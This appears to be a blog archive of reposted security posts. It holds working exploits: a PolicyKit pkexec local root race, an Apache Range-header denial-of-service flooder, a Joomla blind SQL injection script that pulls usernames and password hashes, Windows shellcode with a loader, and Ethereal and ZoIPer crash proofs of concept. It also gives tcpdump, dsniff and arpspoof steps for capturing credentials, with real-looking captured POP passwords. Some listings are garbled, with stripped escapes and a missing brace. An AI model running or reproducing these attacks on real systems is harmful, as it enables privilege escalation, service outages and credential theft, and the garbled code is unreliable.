Oct 06

/* polkit-pwnage.c
*
*
* ==============================
* =      PolicyKit Pwnage      =
* =          by zx2c4          =
* =        Sept 2, 2011        =
* ==============================
*
*
* Howdy folks,
*
* This exploits CVE-2011-1485, a race condition in PolicyKit.
*
* davidz25 explains:
*
* –begin–
* Briefly, the problem is that the UID for the parent process of pkexec(1) is
* read from /proc by stat(2)’ing /proc/PID. The problem with this is that
* this returns the effective uid of the process which can easily be set to 0
* by invoking a setuid-root binary such as /usr/bin/chsh in the parent
* process of pkexec(1). Instead we are really interested in the real-user-id.
* While there’s a check in pkexec.c to avoid this problem (by comparing it to
* what we expect the uid to be – namely that of the pkexec.c process itself which
* is the uid of the parent process at pkexec-spawn-time), there is still a short
* window where an attacker can fool pkexec/polkitd into thinking that the parent
* process has uid 0 and is therefore authorized. It’s pretty hard to hit this
* window – I actually don’t know if it can be made to work in practice.
* –end–
*
* Well, here is, in fact, how it’s made to work in practice. There is as he said an
* attempted mitigation, and the way to trigger that mitigation path is something
* like this:
*
*     $ sudo -u `whoami` pkexec sh
*     User of caller (0) does not match our uid (1000)
*
* Not what we want. So the trick is to execl to a suid at just the precise moment
* /proc/PID is being stat(2)’d. We use inotify to learn exactly when it’s accessed,
* and execl to the suid binary as our very next instruction.
*
* ** Usage **
* $ pkexec –version
* pkexec version 0.101
* $ gcc polkit-pwnage.c -o pwnit
* $ ./pwnit
* [+] Configuring inotify for proper pid.
* [+] Launching pkexec.
* sh-4.2# whoami
* root
* sh-4.2# id
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* sh-4.2#
*
* ** Targets **
* This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which
* as of writing uses 0.101, has backported 0.102's bug fix. A way to check
* this is by looking at the mtime of /usr/bin/pkexec — April 22, 2011 or
* later and you’re out of luck. It’s likely other distributions do the same.
* Fortunately, this exploit is clean enough that you can try it out without
* too much collateral.
*
*
* greets to djrbliss and davidz25.
*
* – zx2c4
* 2-sept-2011
*
*/
 
 
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>
 
/*
 * Entry point. fork()s into two roles:
 *   - parent: watches its own /proc/<pid> directory with inotify and, on the
 *     first IN_ACCESS event, execs the setuid /usr/bin/chsh so that its
 *     effective uid is 0 while pkexec is still inspecting it (the race the
 *     header describes);
 *   - child: waits one second, then execs pkexec on /bin/sh, which makes the
 *     parent above the process pkexec looks at.
 * Returns 0 only when an execl() fails; that failure is not reported.
 *
 * Defender notes: the header attributes the fix to polkit 0.102 (using the
 * real uid rather than the stat(2) result on /proc/PID), so an up-to-date
 * polkit is the mitigation. stdio is closed below, hence the perror() in
 * this function never reaches a terminal.
 */
int main(int argc, char **argv)
{
    printf("=============================\n");
    printf("=      PolicyKit Pwnage     =\n");
    printf("=          by zx2c4         =\n");
    printf("=        Sept 2, 2011       =\n");
    printf("=============================\n\n");
 
    if (fork()) {
        int fd;
        char pid_path[1024];
        /* Path of this process's own /proc entry; "/proc/<int>" is far
         * shorter than the 1024-byte buffer, so sprintf cannot overrun. */
        sprintf(pid_path, "/proc/%i", getpid());
        printf("[+] Configuring inotify for proper pid.\n");
        /* Close stdio before exec'ing chsh (presumably so it cannot
         * prompt); side effect: perror() below is unreadable. */
        close(0); close(1); close(2);
        fd = inotify_init();
        if (fd < 0)
            perror("[-] inotify_init");   /* not fatal: continues with fd == -1 */
        /* Return value is not checked. */
        inotify_add_watch(fd, pid_path, IN_ACCESS);
        /* Zero-length read into a NULL buffer: transfers no data, used only
         * as a blocking wait for the first access event. */
        read(fd, NULL, 0);
        execl("/usr/bin/chsh", "chsh", NULL);
    } else {
        sleep(1);   /* give the parent time to arm its watch */
        printf("[+] Launching pkexec.\n");
        execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
    }
    return 0;
}

Aug 25

        Publish Time:08-25-2011

        Exploit method:

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

# Print the command-line help text to STDOUT.
# Takes no arguments; the return value (that of the last print) is unused.
sub usage {
    print "Apache Remote Denial of Service (memory exhaustion)\n";
    print "by Kingcope\n";
    print "usage: perl killapache.pl <host> [numforks]\n";
    print "example: perl killapache.pl www.example.com 50\n";
}

# Fork $numforks children (a global set at top level); each opens one TCP
# connection to $ARGV[0]:80, sends a single HEAD request whose Range header
# lists 1300 byte ranges, and reads the reply until the server closes it.
# Reads globals: $ARGV[0], $numforks. Writes globals: $pm, $p, $x, $k.
# Return value (that of the last print) is unused by the caller.
#
# Defender note: the cost to the server comes solely from the oversized
# Range header. Rejecting or capping requests with an excessive number of
# byte ranges at the server or a reverse proxy removes the amplification,
# and such headers are straightforward to alert on at a proxy/WAF.
sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
   
# Indirect-object syntax; Parallel::ForkManager->new(...) is the clearer form.
$pm = new Parallel::ForkManager($numforks);

$|=1;            # unbuffered STDOUT
srand(time());   # rand() is never used in the visible script
$p = "";
# Build ",5-0,5-1,...,5-1299", appended after "0-" in the Range header below.
for ($k=0;$k<1300;$k++) {
    $p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
# Parent gets a pid and moves on to spawn the next child; the child falls through.
my $pid = $pm->start and next;    
   
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                                  Proto    => ‘tcp’);

# In the child, $p is replaced by the whole request (the child exits at finish).
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;   # unchecked: a failed connect leaves $sock undefined

# Drain the response; nothing is done with it.
while(<$sock>) {
}
$pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

# Probe $ARGV[0]:80 with one HEAD request carrying "Range:bytes=0-$p" and
# return 1 if the first response line contains "Partial" (the server honours
# byte ranges), else 0. At its only call site (top level) $p has not been
# assigned yet, so the header actually sent is "Range:bytes=0-".
# Reads globals: $ARGV[0], $p. Writes globals: $p, $x.
sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                                  Proto    => ‘tcp’);

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;   # unchecked: a failed connect leaves $sock undefined

# Only the status line is read.
$x = <$sock>;
if ($x =~ /Partial/) {
    print "host seems vuln\n";
    return 1;   
} else {
    return 0;   
}
}

# Script entry: require a host argument, choose the fork count, probe the
# host once, then re-run the flood forever (the while loop has no exit).
# Note: the script has no `use strict; use warnings;`, so all of $numforks,
# $v, $p, $x, $k and $pm are package globals.
if ($#ARGV < 0) {
    usage;   # bareword call; usage() would be clearer
    exit;   
}

# Fork count: taken from $ARGV[1] under the condition shown, else 50.
if ($#ARGV > 1) {
    $numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
    print "Host does not seem vulnerable\n";
    exit;   
}
while(1) {
killapache();
}

May 28

Sniffer/Howto Sniff Contents of the emails

  • Sniff emails sent to 1.2.3.4
    tcpdump -nnvvvS -s 0 -U -w sniff.smtp.pcap dst 1.2.3.4 and dst port 25
  • View the sniffed email data
    wireshark -r sniff.smtp.pcap
    • click on your "sending email address"
    • click on "message text" to view the email contents
  • Sniff insecure POP email
    tcpdump -nnvvvS -s 0 -U -w sniff.smtp.pcap dst 1.2.3.4 and dst port 110
  • Sniff insecure imap email
    tcpdump -nnvvvS -s 0 -U -w sniff.smtp.pcap dst 1.2.3.4 and dst port 143

Sniffer/Howto Sniff web connections for login/passwd

    tcpdump -nnvvvS -s 0 -U -w sniff.web.pcap dst 1.2.3.4 and dst port 80
    wireshark -r sniff.web.pcap

Sniffer/Howto Sniff ftp/telnet connections for login/passwd

    tcpdump -nnvvvS -s 0 -U -w sniff.telnet.pcap dst 1.2.3.4 and dst port 21
    wireshark -r sniff.telnet.pcap
Apr 07

dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.

Home Page (http://monkey.org/~dugsong/dsniff/)

INSTALL Dsniff:

1. software list

libpcap-0.7.2.tar.gz

libnet-1.0.2a.tar.gz

libnids-1.18.tar.gz

dsniff-2.3.tar.gz

2. install gcc and openssl

yum -y install openssl gcc flex bison libpcap-devel libnet

3. install libnids

# tar zxvf libnids-1.18.tar.gz
# cd libnids-1.18
# ./configure
# make
# make install

4. install  dsniff

./configure --prefix=/usr --without-db

make

make install

   If your CentOS version is greater than 5.3 you can install it with yum instead:

yum install dsniff

5. Test dsniff

dsniff -n -i eth0

Output:

04/07/11 15:00:45 tcp 192.168.1.135.3791 -> 122.55.2.222.110 (pop3)
USER hr
PASS xxx123

—————–
04/07/11 15:01:19 tcp 192.168.1.196.4747 -> 122.55.2.222.110 (pop3)
USER cx
PASS chenxia1

—————–
04/07/11 15:01:20 tcp 192.168.1.134.2086 -> 122.55.2.222.110 (pop3)
USER aa-1@xxxx.com
PASS aa-11

—————–
04/07/11 15:01:44 tcp 192.168.1.150.3630 -> 122.55.2.222.110 (pop3)
USER aa-3@xxxx.com
PASS iker-31

5.1 Test 2 (urlsnarf -n -i eth1)

Output:

urlsnarf: listening on eth1 [tcp port 80 or port 8080 or port 3128]
192.168.1.75 – - [07/Apr/2011:15:07:11 +0800] "GET http://218.60.33.7/pos?f=f4v/8/74582008.h264_1.f4v&k=2mCVf5QX4RGNvGTweGoq15snchlv5&e=89170&s=20 HTTP/1.1" – - "http://www.cntingshu.com/js/player/TudouVideoPlayer_Homer_141.swf" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.45 Safari/534.16"
192.168.1.75 – - [07/Apr/2011:15:07:12 +0800] "GET http://218.60.33.7/pos?f=f4v/8/74582008.h264_1.f4v&k=2mCVf5QX4RGNvGTweGoq15snchlv5&e=71906&s=20 HTTP/1.1" – - "http://www.cntingshu.com/js/player/TudouVideoPlayer_Homer_141.swf" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.45 Safari/534.16"
192.168.1.137 – - [07/Apr/2011:15:07:13 +0800] "GET http://safeurl.maxthon.cn/data/config.dat HTTP/1.1" – - "-" "MxAgent"
192.168.1.75 – - [07/Apr/2011:15:07:13 +0800] "GET http://218.60.33.7/pos?f=f4v/8/74582008.h264_1.f4v&k=2mCVf5QX4RGNvGTweGoq15snchlv5&e=12334&s=0 HTTP/1.1" – - "http://www.cntingshu.com/js/player/TudouVideoPlayer_Homer_141.swf" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.45 Safari/534.16"

5.3 arp proxy (switch network sniffer)

echo "1" > /proc/sys/net/ipv4/ip_forward

arpspoof -t 192.168.1.100 192.168.1.1

       Open a new terminal

dsniff -n -i eth1

Mar 16

#include <stdio.h>
#include <string.h>

/*
 * Raw x86 machine code that main() jumps into. It embeds hard-coded absolute
 * call targets (the 4-byte little-endian immediates following the 0xbb
 * opcodes), so it is tied to the one library layout it was written for.
 * The trailing bytes 63 61 6c 63 2e 65 78 65 00 spell the NUL-terminated
 * string "calc.exe" -- presumably a benign test payload.
 */
char liscker[] = 
"\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x31\xc0"
"\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00"; 

/*
 * Treat the byte array as a function and call it; the (int) cast on the
 * result is discarded. As printed, the opening brace of the function body
 * is missing, so the listing does not compile as shown.
 * Defender note: this loader pattern only works where the data segment
 * holding liscker is executable; with NX/DEP enforced the indirect call
 * faults on its first instruction.
 */
int main(int argc, char **argv) 

    int (*shellcode)(); 
    shellcode = (int (*)()) liscker; 
    (int)(*shellcode)();
}

Mar 11

wwwscan is a very good free website security scanner tool. It can help you improve your website's security level; I hope it helps you.

<Usage>:  wwwscan <HostName|Ip> [Options]
<Options>:
          -p port        : set http/https port
          -m thread      : set max thread
          -t timeout     : tcp timeout in seconds
          -r rootpath    : set root path to scan
          -ssl           : will use ssl
<Example>:
          wwwscan www.target.com -p 8080 -m 10 -t 16
          wwwscan www.target.com -r "/test/" -p 80
          wwwscan www.target.com -ssl

You can download it from here.

Mar 02

If you run a busy DNS server or any other service that uses a lot of UDP traffic, it's possible that your default iptables conntrack session settings (connection tracking entries in kernel memory) are too low and netfilter is unable to track all your sessions.

The error is usually something like this:

Sep 10 12:53:44 hostname01 kernel: ip_conntrack: table full, dropping packet.

You need to tune the sysctl net.ipv4.ip_conntrack_max value: say, double it or more, and see whether you still get the error messages on the console or in syslog.

Depending on your OS, the formula for calculating the maximum number of conntrack sessions your box can handle is as follows:

The size of each session record really depends on the kernel config and many other compile options. For 2.6.* kernels it is around 300 bytes.

You can also easily check the current usage of connection tracking:

wc -l /proc/net/ip_conntrack

Default sysctl settings for Red Hat Enterprise boxes; possibly the same applies to Fedora and CentOS.

net.ipv4.netfilter.ip_conntrack_tcp_max_retrans = 3
net.ipv4.netfilter.ip_conntrack_tcp_be_liberal = 0
net.ipv4.netfilter.ip_conntrack_tcp_loose = 3
net.ipv4.netfilter.ip_conntrack_tcp_timeout_max_retrans = 300
net.ipv4.netfilter.ip_conntrack_log_invalid = 0
net.ipv4.netfilter.ip_conntrack_generic_timeout = 600
net.ipv4.netfilter.ip_conntrack_icmp_timeout = 30
net.ipv4.netfilter.ip_conntrack_udp_timeout_stream = 180
net.ipv4.netfilter.ip_conntrack_udp_timeout = 30
net.ipv4.netfilter.ip_conntrack_tcp_timeout_close = 10
net.ipv4.netfilter.ip_conntrack_tcp_timeout_time_wait = 120
net.ipv4.netfilter.ip_conntrack_tcp_timeout_last_ack = 30
net.ipv4.netfilter.ip_conntrack_tcp_timeout_close_wait = 60
net.ipv4.netfilter.ip_conntrack_tcp_timeout_fin_wait = 120
net.ipv4.netfilter.ip_conntrack_tcp_timeout_established = 432000
net.ipv4.netfilter.ip_conntrack_tcp_timeout_syn_recv = 60
net.ipv4.netfilter.ip_conntrack_tcp_timeout_syn_sent = 120
net.ipv4.netfilter.ip_conntrack_checksum = 1
net.ipv4.netfilter.ip_conntrack_buckets = 8192
net.ipv4.netfilter.ip_conntrack_count = 18988
net.ipv4.netfilter.ip_conntrack_max = 34576

You can decrease net.ipv4.netfilter.ip_conntrack_tcp_timeout_established by half, at least.

sysctl -w net.ipv4.netfilter.ip_conntrack_tcp_timeout_established=216000

I hope this helps you with your Linux server network stack tuning. Good luck!

Feb 26

Test Code


#!/usr/bin/php
  <?php 

// No time limit: the loops below issue hundreds of sequential HTTP requests.
ini_set("max_execution_time",0); 

print_r(' 

########################################################################### 

[»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability 

########################################################################### 

[»] Script:   [Joomla] 

[»] Language: [ PHP ] 

[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] 

[»] Greetz to:[ Spécial >>>>His0k4 >>>>   Tous les hackers Algérie 

[»] Dork: inurl:index.php?option=com_joomlaconnect_be 

########################################################################### 

########################################################################### 

# 

#  Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit 

#  [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 

# 

# 

########################################################################### 

'); 

// Boolean-based blind extraction. The only signal used is the length of the
// page returned for a URL with an always-true vs. an always-false suffix.
// Defender note: the oracle exists only because the id value reaches the SQL
// statement unparameterised; casting id to int or using prepared statements
// removes it. The probe traffic is distinctive (the same client sending
// hundreds of requests whose query string contains "and ascii(substring(")
// and is easy to alert on at a WAF or from access logs.
if ($argc > 1) { 

$url = $argv[1]; 

// $r: page length for the always-true suffix; $w: for the always-false one.
$r = strlen(file_get_contents($url."+and+1=1--")); 

echo "\nExploiting:\n"; 

$w = strlen(file_get_contents($url."+and+1=0--")); 

// $t: percentage by which the "false" page differs in size -- the threshold
// every later comparison is measured against.
$t = abs((100-($w/$r*100))); 

echo "Username: "; 

// Find the first position (1..30) at which the "!=0" predicate reads as
// false and remember it in $count; "$i = 30" acts as a loop break.
for ($i=1; $i <= 30; $i++) { 

$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); 

   if (abs((100-($laenge/$r*100))) > $t-1) { 

      $count = $i; 

      $i = 30; 

   } 

} 

// For each position before $count, step the candidate character code up two
// at a time (the jump from 60 to 98 skips codes 60..97) until ">$i" reads as
// false, then settle on $i-1 or $i with one extra query; "$i = 122" breaks.
for ($j = 1; $j < $count; $j++) { 

   for ($i = 46; $i <= 122; $i=$i+2) { 

      if ($i == 60) { 

         $i = 98; 

      } 

      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); 

      if (abs((100-($laenge/$r*100))) > $t-1) { 

         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); 

         if (abs((100-($laenge/$r*100))) > $t-1) { 

            echo chr($i-1); 

         } else { 

            echo chr($i); 

         } 

         $i = 122; 

      } 

   } 

} 

echo "\nPassword: "; 

// Same procedure for a fixed 49 password positions (presumably the stored
// hash:salt layout -- not derivable from this script) with candidate codes
// 46..102; "$i = 102" breaks the inner loop.
for ($j = 1; $j <= 49; $j++) { 

   for ($i = 46; $i <= 102; $i=$i+2) { 

      if ($i == 60) { 

         $i = 98; 

      } 

      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); 

      if (abs((100-($laenge/$r*100))) > $t-1) { 

         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); 

         if (abs((100-($laenge/$r*100))) > $t-1) { 

            echo chr($i-1); 

         } else { 

            echo chr($i); 

         } 

         $i = 102; 

      } 

   } 

} 

} 

?>
Dec 07

/*
* Ethereal network protocol analyzer
* EIGRP Dissector TLV_IP_INT Long IP Address Overflow
* vulnerability
* proof of concept code
* version 1.0 (Mar 26 2004)
*
* by Rémi Denis-Courmont < ethereal at simphalampin dot com >
*   www simphalempin com dev
*
* This vulnerability was found by:
*   Stefan Esser s.esser e-matters de
* whose original advisory may be fetched from:
*   security e-matters de advisories 032004.html
*
* Vulnerable:
*  – Ethereal v0.10.2
*
* Not vulnerable:
*  – Ethereal v0.10.3
*
* Note: this code will simply trigger a denial of service on Ethereal.
* It should really be possible to exploit the buffer overflow
* (apparently up to 29 bytes overflow), but I haven’t tried.
*/
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netdb.h>
/*
 * Raw EIGRP payload sent by proof(). The inline comments document each
 * field; the TLV length field (0x39 where 0x1C is expected, as noted) is
 * what makes the dissector read the trailing 0xff run as a prefix longer
 * than an IPv4 address -- the overflow the header describes.
 * NOTE(review): the string escapes appear mangled in this listing
 * ("x01" where "\x01" would be expected), so the literal as shown does not
 * encode the bytes the comments describe.
 */
static const char packet[] =
        "x01" /* Version */
        "x04" /* Opcode: Reply */
        "x00x00" /* Checksum (invalid) */
        "x00x00x00x00" /* Flags */
        "x00x00x00x00" /* Sequence number */
        "x00x00x00x00" /* ACK */
        "x00x00x00x00" /* AS number */
        /* IP internal routes TLV */
        "x01x02" /* Type */
        "x00x39" /* Length (should be 0x1C) */
        "x00x00x00x00" /* Next hop */
        "x00x00x00x00" /* Delay */
        "x00x00x00x00" /* Bandwidth */
        "x00x00x00" /* MTU */
        "x00" /* Hop count: directly connected */
        "xff" /* Reliability: maximum */
        "x01" /* Load: minimum */
        "x00x00" /* Reserved */
        "xff" /* Prefix length: should be > 0 and <= 32 */
        "x00x00x00" /* Destination network */
        "xffxffxffxff" "xffxffxffxff"
        "xffxffxffxff" "xffxffxffxff"
        "xffxffxffxff" "xffxffxffxff"
        "xffxffxffxff" "xff" /* buffer overflow */
;
/*
 * Send `packet` once over a raw IPv4 socket with IP protocol 88 (EIGRP).
 * Raw sockets need elevated privileges; a socket() failure is reported
 * with perror and the function returns 1.
 * dest: destination address, passed through to sendto().
 * Returns 0 on success, 1 if the socket or the send fails.
 * Note: len is size_t while sendto() returns ssize_t, so in the != test a
 * -1 return is promoted to SIZE_MAX and is still caught as an error.
 */
static int
proof (const struct sockaddr_in *dest)
{
        int fd;
        size_t len;
        fd = socket (PF_INET, SOCK_RAW, 88);
        if (fd == -1)
        {
                perror ("Raw socket error");
                return 1;
        }
        /* Exclude the terminating NUL of the string literal. */
        len = sizeof (packet) – 1;
        if (sendto (fd, packet, len, 0, (const struct sockaddr *)dest,
                        sizeof (struct sockaddr_in)) != len)
        {
                perror ("Packet sending error");
                close (fd);
                return 1;
        }
        puts ("Packet sent!");
        close (fd);
        return 0;
}
/*
 * Print the usage line to stderr.
 * path: argv[0] of the running program.
 * Returns 2, which main() passes on as the exit status.
 */
static int
usage (const char *path)
{
        fprintf (stderr, "Usage: %s <hostname/IP>n", path);
        return 2;
}
/*
 * Entry point: print the banner, resolve argv[1] to an IPv4 address
 * (ai_family is forced to PF_INET because proof() casts the result to
 * sockaddr_in), and hand it to proof().
 * Returns usage()'s 2 on wrong argument count, 1 if resolution fails,
 * otherwise proof()'s status.
 * Note: the addrinfo list from getaddrinfo() is never released with
 * freeaddrinfo(); dest points into it and the process exits right after,
 * so nothing is lost, but it would matter in longer-lived code.
 */
int
main (int argc, char *argv[])
{
        struct sockaddr *dest;
        puts ("Ethereal EIGRP Dissector TLV_IP_INT Long IP Address Overflown"
                "proof of concept coden"
                "Copyright (C) 2004 R<E9>mi Denis-Courmont "
                "<x65x74x68x65x72x65x61x6cx40x73x69x6dx70"
                "x68x61x6cx65x6dx70x69x6ex2ex63x6fx6d>n");
        if (argc != 2)
                return usage (argv[0]);
        else
        {
                struct addrinfo help, *res;
                int check;
                memset (&help, 0, sizeof (help));
                help.ai_family = PF_INET;
                check = getaddrinfo (argv[1], NULL, &help, &res);
                if (check)
                {
                        fprintf (stderr, "%s: %sn", argv[1],
                                        gai_strerror (check));
                        return 1;
                }
                /* First result only; the list is not freed (see above). */
                dest = res->ai_addr;
        }
        return proof ((const struct sockaddr_in *)dest);
}

Nov 27

#!/usr/bin/python

# ZoIPer v2.22 Call-Info Remote Denial Of Service.
# Remote Crash P.O.C.
# Author: Tomer Bitton (Gr33n_G0bL1n)
# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10
#
# Vendor Notified on: 21/09/2009
# Vendor Fix: Fixed in version 2.24 Library 5324
#
# Bad Chars:   \x20  ,  \x09

import sys
import socket
import os

def main(argc , argv):
    # Send one fixed SIP INVITE datagram to <target_ip>:5060 and return.
    # The argc/argv parameters are ignored; sys.argv is read directly.
    # Returns None (so the sys.exit() in the caller exits with status 0);
    # exits via sys.exit() with a usage string when the argument is missing.

    if len(sys.argv) != 2:
        os.system("cls")   # Windows-only screen clear; a no-op failure elsewhere
        sys.exit("Usage: " + sys.argv[0] + " <target_ip>\n")
    target_host = sys.argv[1]
    target_port = 5060

    # The hex bytes are plain ASCII: a SIP INVITE whose header block ends with
    # a "Call-Info:" header holding only whitespace, then "Content-Length: 125"
    # and no body (decodable from the hex below). Per the header comment the
    # vendor fix is in 2.24; on the wire, INVITEs with an empty Call-Info
    # value from unexpected sources are the thing to alert on.
    evil_packet =   "\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\
                    "\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\
                    "\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\
                    "\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\
                    "\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\
                    "\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\
                    "\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\
                    "\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\
                    "\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\
                    "\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\
                    "\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\
                    "\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\
                    "\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\
                    "\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\
                    "\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\
                    "\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\
                    "\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\
                    "\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\
                    "\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\
                    "\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\
                    "\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\
                    "\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\
                    "\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\
                    "\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a"
    os.system("cls")               
    print "[+] ZoIPer Call-Info Remote Denial Of Service\r\n"
    print "[+] Exploited By Gr33n_G0bL1n\r\n"
    print "[+] Connecting to %s on port %d\r\n" % (target_host,target_port)
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # UDP connect() only fixes the peer address; no handshake happens.
        s.connect((target_host,target_port))
        print "[+] Trying To Send Evil Packet…\r\n"
        s.sendall(evil_packet)
        s.close()
        print "[+] Done!\r\n"
    # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit and
    # reports every failure as a connection error; socket.error is the
    # precise exception to catch here. The socket is not closed on that path.
    except:
        print "[x] Connection Error!\r\n"

# Script entry: main() returns None, so the exit status is 0 unless main()
# itself called sys.exit() with the usage string.
if (__name__ == "__main__"):
    sys.exit(main(len(sys.argv), sys.argv))
